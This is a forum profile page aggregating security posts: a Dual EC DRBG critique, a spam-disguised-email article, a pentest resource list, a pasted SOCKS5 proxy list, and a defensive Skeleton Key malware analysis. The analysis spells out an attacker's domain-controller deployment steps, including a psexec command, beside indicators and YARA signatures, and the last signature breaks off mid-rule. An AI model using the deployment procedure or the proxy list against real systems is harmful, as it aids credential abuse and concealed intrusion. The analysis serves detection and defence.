Everything posted by Nytro
-
If you have an antivirus, it may be caused by its self-defense module.
-
What is a "hidden pid"? Are you referring to rootkits?
-
No. But certain people have built bots for Likes/Dislikes. These mass Likes and Dislikes affect reputation.
-
Terrorists Made Their Emails Seem Like Spam to Hide From Intelligence Agencies
By Lily Hay Newman

[Image caption: Maybe there's something meaningful hidden in my spam folder. Image from Gmail]

During David Petraeus and Paula Broadwell's affair, the two would communicate by leaving notes in the drafts folder of a private Gmail account. As a covert communication method it didn't really, um, work. But points for effort! There are other ways to hide (or at least try to hide) emails in plain sight, too. And a recent paper recounts one method the Taliban tried shortly after the 9/11 attacks.

First spotted by Quartz, cryptologist and former NSA officer Michael Wertheimer's paper "Encryption and the NSA Role in International Standards" includes an anecdote about how the NSA wised up to a strategy of turning real emails into spam. By writing messages with spam-like subject lines, combatants were attempting to exploit surveillance filters so that instead of being combed, the messages would be sorted into the spam folder abyss.

Wertheimer explains that during operations in Afghanistan, the U.S. was able to analyze some laptops formerly owned by Taliban members. He says:

    In one case we were able to retrieve an email listing in the customary to/from/subject/date format. There was only one English language email listed. The "to" and "from" addresses were nondescript (later confirmed to be combatants) and the subject line read: CONSOLIDATE YOUR DEBT.

From a surveillance perspective, Wertheimer writes that this highlights the importance of filtering algorithms. Implementing them makes parsing huge amounts of data easier, but it also presents opportunities for someone with a secret to figure out what type of information is being tossed out and exploit the loophole. The new trend in affair protocol could be sending love notes with subject line "Pain-free penis enlargement!"

Future Tense is a partnership of Slate, New America, and Arizona State University.
Source: http://www.slate.com/blogs/future_tense/2015/01/15/after_9_11_laptops_showed_that_taliban_members_had_hidden_messages_in_spam.html
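The loophole the article describes is easy to see in miniature. Below is a toy, hypothetical keyword filter (no real provider's filter works this simply; the phrase list and function name are invented for illustration): anything whose subject matches a spam phrase is diverted to the spam folder, so a monitor that only combs the inbox never sees it.

```python
# Toy illustration of a naive keyword-based spam filter. Messages whose
# subject contains a known spam phrase are routed to the spam folder --
# and are therefore invisible to anything that reads only the inbox.
SPAM_PHRASES = ["consolidate your debt", "penis enlargement", "you have won"]

def route(subject: str) -> str:
    """Return the folder a message lands in under this naive policy."""
    s = subject.lower()
    return "spam" if any(p in s for p in SPAM_PHRASES) else "inbox"

# A covert message dressed up as spam slips out of the monitored inbox:
print(route("Meeting at dawn"))            # -> inbox
print(route("CONSOLIDATE YOUR DEBT"))      # -> spam
```

The same asymmetry works in reverse for the analyst: once you know what the filter discards, the spam folder itself becomes the interesting corpus.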
-
Hopefully the last post I'll ever write on Dual EC DRBG
Nytro posted a topic in Tutoriale in engleza
I've been working on some other blog posts, including a conclusion of (or at least an installment in) this exciting series on zero knowledge proofs. That's coming soon, but first I wanted to take a minute to, well, rant.

The subject of my rant is this fascinating letter authored by NSA cryptologist Michael Wertheimer in February's Notices of the American Mathematical Society. Dr. Wertheimer is currently the Director of Research at NSA, and formerly held the position of Assistant Deputy Director and CTO of the Office of the Director of National Intelligence for Analysis. In other words, this is a guy who should know what he's talking about.

The subject of Dr. Wertheimer's letter is near and dear to my heart: the alleged subversion of NIST's standards for random number generation -- a subversion that was long suspected and apparently confirmed by classified documents leaked by Edward Snowden. The specific algorithm in question is called Dual EC DRBG, and it very likely contains an NSA backdoor. Those who've read this blog should know that I think it's as suspicious as a three dollar bill.

Reading Dr. Wertheimer's letter, you might wonder what I'm so upset about. On the face of it, the letter appears to express regret. To quote (with my emphasis):

    With hindsight, NSA should have ceased supporting the Dual_EC_DRBG algorithm immediately after security researchers discovered the potential for a trapdoor. In truth, I can think of no better way to describe our failure to drop support for the Dual_EC_DRBG algorithm as anything other than regrettable. The costs to the Defense Department to deploy a new algorithm were not an adequate reason to sustain our support for a questionable algorithm. Indeed, we support NIST's April 2014 decision to remove the algorithm. Furthermore, we realize that our advocacy for the Dual_EC_DRBG casts suspicion on the broader body of work NSA has done to promote secure standards.
I agree with all of that. The trouble is that on closer examination, the letter doesn't express regret for the inclusion of Dual EC DRBG in national standards. The transgression Dr. Wertheimer identifies is merely that NSA continued to support the algorithm after major questions were raised. That's bizarre.

Even worse, Dr. Wertheimer reserves a substantial section of his letter for a defense of the decision to deploy Dual EC. It's those points that I'd like to address in this post. Let's take them one at a time.

1: The Dual_EC_DRBG was one of four random number generators in the NIST standard; it is neither required nor the default.

It's absolutely true that Dual EC was only one of four generators in the NIST standard. It was not required for implementers to use it, and in fact they'd be nuts to use it -- given that overall it's at least two orders of magnitude slower than the other proposed generators.

The bizarre thing is that people did indeed adopt Dual EC in major commercial software packages. Specifically, RSA Security included it as the default generator in their popular BSAFE software library. Much worse, there's evidence that RSA was asked to do this by NSA, and was compensated for its compliance.

This is the danger with standards. Once NIST puts its seal on an algorithm, it's considered "safe". If the NSA came to a company and asked it to use some strange, non-standard algorithm, the request would be considered deeply suspicious by company and customers alike. But how can you refuse to use a standard if your biggest client asks you to? Apparently RSA couldn't.

2: The NSA-generated elliptic curve points were necessary for accreditation of the Dual_EC_DRBG but only had to be implemented for actual use in certain DoD applications.

This is a somewhat misleading statement, one that really needs to be unpacked. First, the original NSA proposal of Dual EC DRBG contained no option for alternate curve points.
This is an important point, since it's the selection of curve points that gives Dual EC its potential for a "back door". By generating two default points (P, Q) in a specific way, the NSA may have been able to create a master key that would allow them to very efficiently decrypt SSL/TLS connections. If you like conspiracy theories, consider what NIST's John Kelsey was told when he asked how the NSA's points were generated.

In 2004-2005, several participants on the ANSI X9 tools committee pointed out the potential danger of this backdoor. One of them even went so far as to file a patent on using the idea to implement key escrow for SSL/TLS connections. (It doesn't get more passive aggressive than that.)

In response to the discovery of such an obvious flaw, the ANSI X9 committee immediately stopped recommending the NSA's points -- and relegated them to be simply an option, one to be used by the niche set of government users who required them.

I'm only kidding! Actually the committee did no such thing. Instead, at the NSA's urging, the ANSI committee retained the original NSA points as the recommended parameters for the standard. It then added an optional procedure for generating alternative points. When NIST later adopted the generator in its SP800-90A standard, it mirrored the ANSI decision. But even worse, NIST didn't even bother to publish the alternative point generation algorithm. To actually implement it, you'd have to go buy the (expensive) non-public-domain ANSI standard and figure out how to implement it yourself.

This is, to paraphrase Douglas Adams, the standards committee equivalent of putting the details in the bottom of a locked filing cabinet stuck in a disused lavatory with a sign on the door saying "Beware of the Leopard". To the best of our knowledge, nobody has ever used ANSI's alternative generation procedure in a single one of the many implementations of Dual EC DRBG in commercial software.
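To make the "master key" claim concrete, here is a sketch of the standard backdoor argument (the observation publicized by Shumow and Ferguson in 2007; output truncation is glossed over for simplicity):

```latex
% Dual EC round, with internal state $s_i$ and curve points $P, Q$;
% $x(\cdot)$ denotes the x-coordinate of an elliptic curve point:
\[
  s_{i+1} = x(s_i \cdot P), \qquad r_i = x(s_i \cdot Q)
  \quad \text{(truncated to form the output)}
\]
% If the party that generated the points knows a scalar $d$ with $P = d \cdot Q$,
% then recovering the full point $R = s_i \cdot Q$ from one output yields the
% next internal state:
\[
  x(d \cdot R) = x(d \, s_i \cdot Q) = x(s_i \cdot P) = s_{i+1},
\]
% after which every subsequent output of the generator is predictable.
```

For honestly generated points, no such d is known to anyone; the suspicion is precisely that the default (P, Q) were not generated that way.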
It's not even clear how you could have used that procedure in a FIPS-certified product, since the FIPS evaluation process (conducted by CMVP) still requires you to test against the NSA-generated points.

3: The trapdoor concerns were openly studied by ANSI X9F1, NIST, and by the public in 2007.

This statement has the benefit of being literally true, while also being pretty damned misleading. It is true that in 2007 -- after Dual EC had been standardized -- two Microsoft researchers, Dan Shumow and Niels Ferguson, openly raised the alarm about Dual EC. The problem here is that the flaws in Dual EC were not first discovered in 2007. They were discovered much earlier in the standardization process, and nobody ever heard about them.

As I noted above, the ANSI X9 committee detected the flaws in Dual EC as early as 2004, and in close consultation with NSA agreed to address them -- in a manner that was highly beneficial to the NSA. But perhaps that's understandable, given that the committee was anything but "open". In fact, this is an important aspect of the controversy that even NIST has criticized. The standardization of these algorithms was conducted through ANSI, and the closed ANSI committee consisted of representatives from a few select companies, NIST, and the NSA. No public notice was given of the potential vulnerabilities discovered in the RNG. Moreover, a patent application that might have shone light on the backdoor was mired in NSA pre-publication review for over two years.

This timeline issue might seem academic, but bear this in mind: we now know that RSA Security began using the Dual EC DRBG random number generator in BSAFE -- as the default, I remind you -- way back in 2004. That means for three years this generator was widely deployed, yet serious concerns were not communicated to the public. To state that the trapdoor concerns were "openly" studied in 2007 is absolutely true. It's just completely irrelevant.
In conclusion

I'm not a mathematician, but like anyone who works in a mathematical area, I find there are aspects of the discipline that I love. For me it's the precision of mathematical statements, and the fact that the truth or falsity of a statement can -- ideally -- be evaluated from the statement itself, without resorting to differing opinions or understandings of the context.

While Dr. Wertheimer's letter is hardly a mathematical work, it troubles me to see such confusing statements in a publication of the AMS. As a record of history, Dr. Wertheimer's letter leaves much to be desired, and could easily lead people to the wrong understanding. Given the stakes, we deserve a more exact accounting of what happened with Dual EC DRBG. I hope someday we'll see that.

Posted by Matthew Green at 2:02 PM
Source: http://blog.cryptographyengineering.com/2015/01/hopefully-last-post-ill-ever-write-on.html
-
[h=1]16-01-15 | VIP Socks 5 (37)[/h]
Checked & filtered:
108.61.199.192:52159
109.214.194.248:40557
120.149.52.133:46698
144.76.4.211:11486
147.156.208.150:8020
170.163.116.108:80
173.176.202.55:39559
174.7.63.126:41263
180.153.139.246:8888
184.155.230.151:44911
198.27.67.24:53193
199.36.221.3:51328
205.237.251.209:13884
206.188.209.38:8080
206.206.85.37:28672
207.66.105.37:11944
209.33.80.159:46768
221.132.35.5:2214
46.4.88.203:9050
58.160.148.1:54931
61.147.67.2:9125
61.15.158.32:57809
63.141.227.91:7504
67.187.241.140:22465
67.232.19.137:51816
70.173.38.183:19102
72.133.32.186:24412
73.29.157.190:24521
74.100.219.155:40866
76.190.129.189:37506
76.8.6.186:29803
77.120.246.195:48059
77.242.22.254:8741
84.38.227.212:2235
84.40.9.22:50027
92.247.235.170:40325
97.101.240.83:21729

Source: 16-01-15 | VIP Socks 5 (37) - Pastebin.com
-
Announcement: Anyone who keeps abusing Likes and Dislikes, or uses bots for that, gets banned.
-
Posted January 13th, 2015 by gk

A new release for the stable Tor Browser is available from the Tor Browser Project page and also from our distribution directory. Tor Browser 4.0.3 is based on Firefox ESR 31.4.0, which features important security updates to Firefox. Additionally, it contains updates to meek, NoScript and Tor Launcher.

Here is the changelog since 4.0.2:

All Platforms
- Update Firefox to 31.4.0esr
- Update NoScript to 2.6.9.10
- Update meek to 0.15
- Update Tor Launcher to 0.2.7.0.2
  - Translation updates only

Source: https://blog.torproject.org/blog/tor-browser-403-released
-
[h=2]Awesome Penetration Testing[/h]
A collection of awesome penetration testing resources, tools, books, confs, magazines and other shiny things.

[h=3]Online Resources[/h]

[h=4]Penetration Testing Resources[/h]
- Metasploit Unleashed - Free Offensive Security Metasploit course
- PTES - Penetration Testing Execution Standard
- OWASP - Open Web Application Security Project
- OSSTMM - Open Source Security Testing Methodology Manual

[h=4]Shell Scripting Resources[/h]
- LSST - Linux Shell Scripting Tutorial

[h=4]Linux Resources[/h]
- Kernelnewbies - A community of aspiring Linux kernel developers who work to improve their kernels

[h=4]Shellcode Development[/h]
- Shellcode Tutorials - Tutorials on how to write shellcode
- Shellcode Examples - Shellcodes database

[h=4]Social Engineering Resources[/h]
- Social Engineering Framework - An information resource for social engineers

[h=4]Lock Picking Resources[/h]
- Schuyler Towne channel - Lockpicking videos and security talks

[h=3]Tools[/h]

[h=4]Penetration Testing Distributions[/h]
- Kali - A Linux distribution designed for digital forensics and penetration testing
- NST - Network Security Toolkit distribution
- Pentoo - Security-focused live CD based on Gentoo
- BackBox - Ubuntu-based distribution for penetration tests and security assessments

[h=4]Basic Penetration Testing Tools[/h]
- Metasploit - World's most used penetration testing software
- Burp - An integrated platform for performing security testing of web applications

[h=4]Vulnerability Scanners[/h]
- Netsparker - Web application security scanner
- Nexpose - Vulnerability management & risk management software
- Nessus - Vulnerability, configuration, and compliance assessment
- Nikto - Web application vulnerability scanner
- OpenVAS - Open source vulnerability scanner and manager
- OWASP Zed Attack Proxy - Penetration testing tool for web applications
- w3af - Web application attack and audit framework
- Wapiti - Web application vulnerability scanner

[h=4]Network Tools[/h]
- nmap - Free security scanner for network exploration & security audits
- tcpdump/libpcap - A common packet analyzer that runs under the command line
- Wireshark - A network protocol analyzer for Unix and Windows
- Network Tools - Different network tools: ping, lookup, whois, etc.
- netsniff-ng - A Swiss army knife for network sniffing
- Intercepter-NG - A multifunctional network toolkit

[h=4]SSL Analysis Tools[/h]
- SSLyze - SSL configuration scanner

[h=4]Hex Editors[/h]
- HexEdit.js - Browser-based hex editing

[h=4]Crackers[/h]
- John the Ripper - Fast password cracker
- Online MD5 cracker - Online MD5 hash cracker

[h=4]Windows Utils[/h]
- Sysinternals Suite - The Sysinternals troubleshooting utilities
- Windows Credentials Editor - Security tool to list logon sessions and add, change, list and delete associated credentials

[h=4]DDoS Tools[/h]
- LOIC - An open source network stress tool for Windows
- JS LOIC - JavaScript in-browser version of LOIC

[h=4]Social Engineering Tools[/h]
- SET - The Social-Engineer Toolkit from TrustedSec

[h=4]Anonymity Tools[/h]
- Tor - Free software for enabling onion-routed online anonymity
- I2P - The Invisible Internet Project

[h=4]Reverse Engineering Tools[/h]
- IDA Pro - A Windows, Linux or Mac OS X hosted multi-processor disassembler and debugger
- WDK/WinDbg - Windows Driver Kit and WinDbg
- OllyDbg - An x86 debugger that emphasizes binary code analysis

[h=3]Books[/h]

[h=4]Penetration Testing Books[/h]
- The Art of Exploitation by Jon Erickson, 2008
- Metasploit: The Penetration Tester's Guide by David Kennedy and others, 2011
- Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014
- Rtfm: Red Team Field Manual by Ben Clark, 2014
- The Hacker Playbook by Peter Kim, 2014
- The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013
- Professional Penetration Testing by Thomas Wilhelm, 2013
- Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012
- Violent Python by TJ O'Connor, 2012
- Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton, Adam Greene, Pedram Amini, 2007

[h=4]Hackers Handbook Series[/h]
- The Shellcoder's Handbook by Chris Anley and others, 2007
- The Web Application Hacker's Handbook by D. Stuttard, M. Pinto, 2011
- iOS Hacker's Handbook by Charlie Miller and others, 2012
- Android Hacker's Handbook by Joshua J. Drake and others, 2014
- The Browser Hacker's Handbook by Wade Alcorn and others, 2014

[h=4]Network Analysis Books[/h]
- Nmap Network Scanning by Gordon Fyodor Lyon, 2009
- Practical Packet Analysis by Chris Sanders, 2011
- Wireshark Network Analysis by Laura Chappell, Gerald Combs, 2012

[h=4]Reverse Engineering Books[/h]
- Reverse Engineering for Beginners by Dennis Yurichev (free!)
- The IDA Pro Book by Chris Eagle, 2011
- Practical Reverse Engineering by Bruce Dang and others, 2014

[h=4]Malware Analysis Books[/h]
- Practical Malware Analysis by Michael Sikorski, Andrew Honig, 2012
- The Art of Memory Forensics by Michael Hale Ligh and others, 2014

[h=4]Windows Books[/h]
- Windows Internals by Mark Russinovich, David Solomon, Alex Ionescu

[h=4]Social Engineering Books[/h]
- The Art of Deception by Kevin D. Mitnick, William L. Simon, 2002
- The Art of Intrusion by Kevin D. Mitnick, William L. Simon, 2005
- Ghost in the Wires by Kevin D. Mitnick, William L. Simon, 2011
- No Tech Hacking by Johnny Long, Jack Wiles, 2008
- Social Engineering: The Art of Human Hacking by Christopher Hadnagy, 2010
- Unmasking the Social Engineer: The Human Element of Security by Christopher Hadnagy, 2014

[h=4]Lock Picking Books[/h]
- Practical Lock Picking by Deviant Ollam, 2012
- Keys to the Kingdom by Deviant Ollam, 2012

[h=3]Vulnerability Databases[/h]
- NVD - US National Vulnerability Database
- CERT - US Computer Emergency Readiness Team
- OSVDB - Open Sourced Vulnerability Database
- Bugtraq - Symantec SecurityFocus
- Exploit-DB - Offensive Security Exploit Database
- Fulldisclosure - Full Disclosure Mailing List
- MS Bulletin - Microsoft Security Bulletin
- MS Advisory - Microsoft Security Advisories
- Inj3ct0r - Inj3ct0r Exploit Database
- Packet Storm - Packet Storm Global Security Resource
- SecuriTeam - SecuriTeam Vulnerability Information
- CXSecurity - CXSecurity Bugtraq List
- Vulnerability Laboratory - Vulnerability Research Laboratory
- ZDI - Zero Day Initiative

[h=3]Security Courses[/h]
- Offensive Security Training - Training from BackTrack/Kali developers
- SANS Security Training - Computer security training & certification
- Open Security Training - Training material for computer security classes
- CTF Field Guide - Everything you need to win your next CTF competition

[h=3]Information Security Conferences[/h]
- DEF CON - An annual hacker convention in Las Vegas
- Black Hat - An annual security conference in Las Vegas
- BSides - A framework for organising and holding security conferences
- CCC - An annual meeting of the international hacker scene in Germany
- DerbyCon - An annual hacker conference based in Louisville
- PhreakNIC - A technology conference held annually in middle Tennessee
- ShmooCon - An annual US East Coast hacker convention
- CarolinaCon - An infosec conference, held annually in North Carolina
- HOPE - A conference series sponsored by the hacker magazine 2600
- SummerCon - One of the oldest hacker conventions, held during summer
- Hack.lu - An annual conference held in Luxembourg
- HITB - Deep-knowledge security conference held in Malaysia and The Netherlands
- Troopers - Annual international IT security event with workshops held in Heidelberg, Germany
- Hack3rCon - An annual US hacker conference
- ThotCon - An annual US hacker conference held in Chicago
- LayerOne - An annual US security conference held every spring in Los Angeles
- DeepSec - Security conference in Vienna, Austria
- SkyDogCon - A technology conference in Nashville

[h=3]Information Security Magazines[/h]
- 2600: The Hacker Quarterly - An American publication about technology and the computer "underground"
- Hakin9 - A Polish online, weekly publication on IT security

[h=3]Awesome Lists[/h]
- SecTools - Top 125 network security tools
- C/C++ Programming - One of the main languages for open source security tools
- .NET Programming - A software framework for Microsoft Windows platform development
- Shell Scripting - Command-line frameworks, toolkits, guides and gizmos
- Ruby Programming by @SiNdresorhus - JavaScript in command-line
- Node.js Programming by @vndmtrx - JavaScript in command-line
- Python tools for penetration testers - Lots of pentesting tools are written in Python
- Python Programming by @svaksha - General Python programming
- Python Programming by @vinta - General Python programming
- Android Security - A collection of Android security related resources
- Awesome Awesomeness - The list of the lists

[h=3]Contribution[/h]
Your contributions and suggestions are heartily welcome.

[h=3]License[/h]
This work is licensed under a Creative Commons Attribution 4.0 International License.

Source: https://github.com/enaqx/awesome-pentest
-
Skeleton Key Malware Analysis
Author: Dell SecureWorks Counter Threat Unit™ Threat Intelligence
Date: 12 January 2015
URL: Skeleton Key Malware Analysis | Dell SecureWorks

Summary

Dell SecureWorks Counter Threat Unit (CTU) researchers discovered malware that bypasses authentication on Active Directory (AD) systems that implement single-factor (password-only) authentication. Threat actors can use a password of their choosing to authenticate as any user. This malware was given the name "Skeleton Key."

CTU researchers discovered Skeleton Key on a client network that used single-factor authentication for access to webmail and VPN, giving the threat actor unfettered access to remote access services. Skeleton Key is deployed as an in-memory patch on a victim's AD domain controllers to allow the threat actor to authenticate as any user, while legitimate users can continue to authenticate as normal. Skeleton Key's authentication bypass also allows threat actors with physical access to log in and unlock systems that authenticate users against the compromised AD domain controllers.

The only known Skeleton Key samples as of this publication lack persistence and must be redeployed when a domain controller is restarted. CTU researchers suspect that threat actors can only identify a restart based on their inability to successfully authenticate using the bypass, as no other malware was detected on the domain controllers. Within eight hours to eight days of a restart, threat actors used other remote access malware already deployed on the victim's network to redeploy Skeleton Key on the domain controllers.

Skeleton Key requires domain administrator credentials for deployment. CTU researchers have observed threat actors deploying Skeleton Key using credentials stolen from critical servers, administrators' workstations, and the targeted domain controllers.

Analysis

CTU researchers initially observed a Skeleton Key sample named ole64.dll on a compromised network (see Table 1).
Attribute     Value or description
Filename      ole64.dll
MD5           bf45086e6334f647fda33576e2a05826
SHA1          5083b17ccc50dd0557dfc544f84e2ab55d6acd92
Compile time  2014-02-19 09:31:29
Deployed      As required (typically downloaded using malware and then deleted after use)
File size     49664 bytes
Sections      .text, .rdata, .data, .pdata, .rsrc, .reloc
Exports       ii (installs the patch), uu (uninstalls the patch), DllEntryPoint (default DLL entry point)

Table 1. Skeleton Key sample ole64.dll.

When investigating ole64.dll, CTU researchers discovered an older variant named msuta64.dll on a "jump host" in the victim's network (see Table 2). The jump host is any system previously compromised by the threat actors' remote access malware. This variant includes additional debug statements, which allow the Skeleton Key developer to observe the memory addresses involved in the patching process.

Attribute     Value or description
Filename      msuta64.dll
MD5           66da7ed621149975f6e643b4f9886cfd
SHA1          ad61e8daeeba43e442514b177a1b41ad4b7c6727
Compile time  2012-09-20 08:07:12
Deployed      2013-09-29 07:58:16
File size     50688 bytes
Sections      .text, .rdata, .data, .pdata, .rsrc, .reloc
Exports       i (installs the patch), u (uninstalls the patch), DllEntryPoint (default DLL entry point)

Table 2. Skeleton Key sample msuta64.dll.
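One way to check a suspect DLL against the hashes in Tables 1 and 2 is to compute its MD5 and SHA1 locally. A minimal sketch using Python's standard hashlib (the function name is my own, not from the report):

```python
import hashlib

def file_hashes(path: str) -> tuple[str, str]:
    """Return (MD5, SHA1) hex digests of a file, for comparison
    against published indicators such as Tables 1 and 2."""
    md5, sha1 = hashlib.md5(), hashlib.sha1()
    with open(path, "rb") as f:
        # Read in chunks so large files don't need to fit in memory.
        for chunk in iter(lambda: f.read(65536), b""):
            md5.update(chunk)
            sha1.update(chunk)
    return md5.hexdigest(), sha1.hexdigest()
```

Usage: `file_hashes(r"C:\WINDOWS\system32\ole64.dll")` and compare each digest against the indicator tables; remember the samples were typically deleted after use, so an absent file proves nothing.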
The threat actors used the following process to deploy Skeleton Key as a 64-bit DLL file:

1. Upload the Skeleton Key DLL file to a staging directory on a jump host in the victim's network. CTU researchers have observed three filenames associated with the Skeleton Key DLL file: ole64.dll, ole.dll, and msuta64.dll. Windows systems include a legitimate ole32.dll file, but it is not related to this malware.
2. Attempt to access the administrative shares on the domain controllers using a list of stolen domain administrator credentials.
3. If the stolen credentials are no longer valid, use password theft tools to extract clear-text domain administrator passwords from one of the following locations, which suggests a familiarity with the victim's environment:
   - memory of another accessible server on the victim's network
   - domain administrators' workstations
   - targeted domain controllers
4. Use valid domain administrator credentials to copy the Skeleton Key DLL to C:\WINDOWS\system32\ on the target domain controllers.
5. Use the PsExec utility to run the Skeleton Key DLL remotely on the target domain controllers using the rundll32 command. The threat actor's chosen password is formatted as an NTLM password hash rather than provided in clear text. After Skeleton Key is deployed, the threat actor can authenticate as any user using the threat actor's configured NTLM password hash:

   psexec -accepteula \\%TARGET-DC% rundll32 <DLL filename> ii <NTLM password hash>

6. Delete the Skeleton Key DLL file from C:\WINDOWS\system32\ on the targeted domain controllers.
7. Delete the Skeleton Key DLL file from the staging directory on the jump host.
8. Test for successful Skeleton Key deployment using "net use" commands with an AD account and the password that corresponds to the configured NTLM hash.

CTU researchers have observed a pattern for the injected password that suggests that the threat group has deployed Skeleton Key in multiple organizations.
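The deployment command above (rundll32 launched via PsExec with an NTLM hash as an argument) suggests one hunting artifact: a rundll32 invocation carrying a 32-hex-character argument. A minimal sketch of such a check; the helper name is hypothetical, and collecting process command lines from endpoints is environment-specific:

```python
import re

# 32 hexadecimal characters, matching the NTLM-hash argument format noted
# in the deployment command. Word boundaries avoid matching longer hex runs.
NTLM_HASH_RE = re.compile(r"\b[0-9a-fA-F]{32}\b")

def suspicious_cmdline(cmdline: str) -> bool:
    """Flag command lines pairing rundll32 with an NTLM-hash-like argument."""
    return "rundll32" in cmdline.lower() and bool(NTLM_HASH_RE.search(cmdline))

print(suspicious_cmdline(
    r"rundll32 ole64.dll ii bf45086e6334f647fda33576e2a05826"))   # True
print(suspicious_cmdline(r"rundll32 shell32.dll,Control_RunDLL"))  # False
```

Expect benign false positives (GUID fragments and other hex blobs also reach 32 hex characters), so this is a triage filter, not a verdict.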
The use of PsExec can be detected within a Windows environment by alerting on the Windows events generated by the utility. The following event IDs observed on the targeted domain controllers record the PsExec tool installing its service, starting the service, and stopping the service. These events are created every time PsExec is used, so additional analysis of the events is required to determine whether they are malicious or legitimate:

Unexpected PSEXESVC service install events (event ID 7045) on AD domain controllers:
  Log Name: System
  Source: Service Control Manager
  Summary: A service was installed in the system. Service File Name: %SystemRoot%\PSEXESVC.exe

Unexpected PSEXESVC service start/stop events (event ID 7036) on AD domain controllers:
  Log Name: System
  Source: Service Control Manager
  Summary: "The PSEXESVC service entered the running state." / "The PSEXESVC service entered the stopped state."

When run, Skeleton Key performs the following tasks:

1. Check for one of the following compatible 64-bit Windows versions. The malware is not compatible with 32-bit Windows versions or with Windows Server versions beginning with Windows Server 2012 (6.2):
   - 6.1 (Windows 2008 R2)
   - 6.0 (Windows Server 2008)
   - 5.2 (Windows 2003 R2)
2. Use the SeDebugPrivilege function to acquire the necessary administrator privileges to write to the Local Security Authority Subsystem Service (LSASS) process. This process controls security functions for the AD domain, including user account authentication.
3. Enumerate available processes to acquire a handle to the LSASS process.
4. Obtain addresses for the authentication-related functions that will be patched:
   - CDLocateCSystem -- located in cryptdll.dll
   - SamIRetrieveMultiplePrimaryCredentials -- located in samsrv.dll
   - SamIRetrievePrimaryCredentials -- located in samsrv.dll
5. Perform OS-specific adjustments using the global variable set during the compatibility check in step 1.
6. Use the OpenProcess function to acquire a handle to the LSASS process.
7. Reserve and allocate the required memory space to edit and patch the LSASS process's memory.
8. Patch relevant functions based on the operating system:
   - CDLocateCSystem (all compatible Windows versions)
   - SamIRetrieveMultiplePrimaryCredentials (only Windows 2008 R2 (6.1))
   - SamIRetrievePrimaryCredentials (all compatible Windows versions other than Windows 2008 R2 (6.1))

Skeleton Key performs the following steps to patch each function:

1. Call the VirtualProtectEx function to change the memory protection to allow writing to the required memory allocations (PAGE_EXECUTE_READWRITE, 0x40). This step allows the function's code to be updated in memory.
2. Call the WriteProcessMemory function to change the address of the target function to point to the patched code. This change causes calls to the target function to use the patch instead.
3. Restore the original memory protection by calling VirtualProtectEx with the original memory protection flags. This step is likely intended to avoid suspicious writable and executable memory allocations.

After patching, the threat actor can use the Skeleton Key password configured at the time of deployment to log in as any domain user. Legitimate users can still log in using their own passwords. This authentication bypass applies to all services that use single-factor AD authentication, such as webmail and VPNs, and it also allows a threat actor with physical access to a compromised system to unlock the computer by typing the injected password on the keyboard.

Possible link to domain replication issues

The Skeleton Key malware does not transmit network traffic, making network-based detection ineffective. However, the malware has been implicated in domain replication issues that may indicate an infection. Shortly after each deployment of the Skeleton Key malware observed by CTU researchers, domain controllers experienced replication issues that could not be explained or addressed by Microsoft support and eventually required a reboot to resolve.
These reboots removed Skeleton Key's authentication bypass because the malware does not have a persistence mechanism. Figure 1 shows the timeline of these reboots and the threat actors' subsequent password theft, lateral expansion, and Skeleton Key deployment. Redeployments typically occurred within several hours to several days of the reboot. Figure 1. Relationships of deployments and reboots observed by CTU researchers, April - July 2014. (Source: Dell SecureWorks) Countermeasures The Skeleton Key malware bypasses authentication and does not generate network traffic. As a result, network-based intrusion detection and intrusion prevention systems (IDS/IPS) will not detect this threat. However, CTU researchers wrote the YARA signatures in Appendix A to detect a Skeleton Key DLL and the code it injects into the LSASS process's memory. Threat indicators The threat indicators in Table 3 can be used to detect activity related to the Skeleton Key malware. [TABLE=class: tabularr] [TR] [TH]Indicator[/TH] [TH]Type[/TH] [TH]Context[/TH] [/TR] [TR] [TD]66da7ed621149975f6e643b4f9886cfd[/TD] [TD]MD5 hash[/TD] [TD]Skeleton Key patch msuta64.dll[/TD] [/TR] [TR] [TD]ad61e8daeeba43e442514b177a1b41ad4b7c6727[/TD] [TD]SHA1 hash[/TD] [TD]Skeleton Key patch msuta64.dll[/TD] [/TR] [TR] [TD]bf45086e6334f647fda33576e2a05826[/TD] [TD]MD5 hash[/TD] [TD]Skeleton Key patch ole64.dll[/TD] [/TR] [TR] [TD]5083b17ccc50dd0557dfc544f84e2ab55d6acd92[/TD] [TD]SHA1 hash[/TD] [TD]Skeleton Key patch ole64.dll[/TD] [/TR] [/TABLE] Table 3. Indicators for the Skeleton Key malware. Conclusion The CTU research team recommends that organizations implement the following protections to defend against the Skeleton Key malware: Multi-factor authentication for all remote access solutions, including VPNs and remote email, prevents threat actors from bypassing single-factor authentication or authenticating using stolen static credentials. 
A process creation audit trail on workstations and servers, including AD domain controllers, may detect Skeleton Key deployments. Specifically, organizations should look for the following artifacts: Unexpected PsExec.exe processes and the use of the PsExec "-accepteula" command line argument Unexpected rundll32.exe processes Process arguments that resemble NTLM hashes (32 characters long, containing digits 0-9 and characters A-F) [*]Monitoring Windows Service Control Manager events on AD domain controllers may reveal unexpected service installation events (event ID 7045) and service start/stop events (event ID 7036) for PsExec's PSEXESVC service. Appendix A — YARA signatures The following YARA signatures detect the presence of Skeleton Key on a system, by scanning either a suspicious file or a memory dump of Active Directory domain controllers suspected to contain Skeleton Key. rule skeleton_key_patcher { strings: $target_process = "lsass.exe" wide $dll1 = "cryptdll.dll" $dll2 = "samsrv.dll" $name = "HookDC.dll" $patched1 = "CDLocateCSystem" $patched2 = "SamIRetrievePrimaryCredentials" $patched3 = "SamIRetrieveMultiplePrimaryCredentials" condition: all of them } rule skeleton_key_injected_code { strings: $injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 } $patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 } $patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 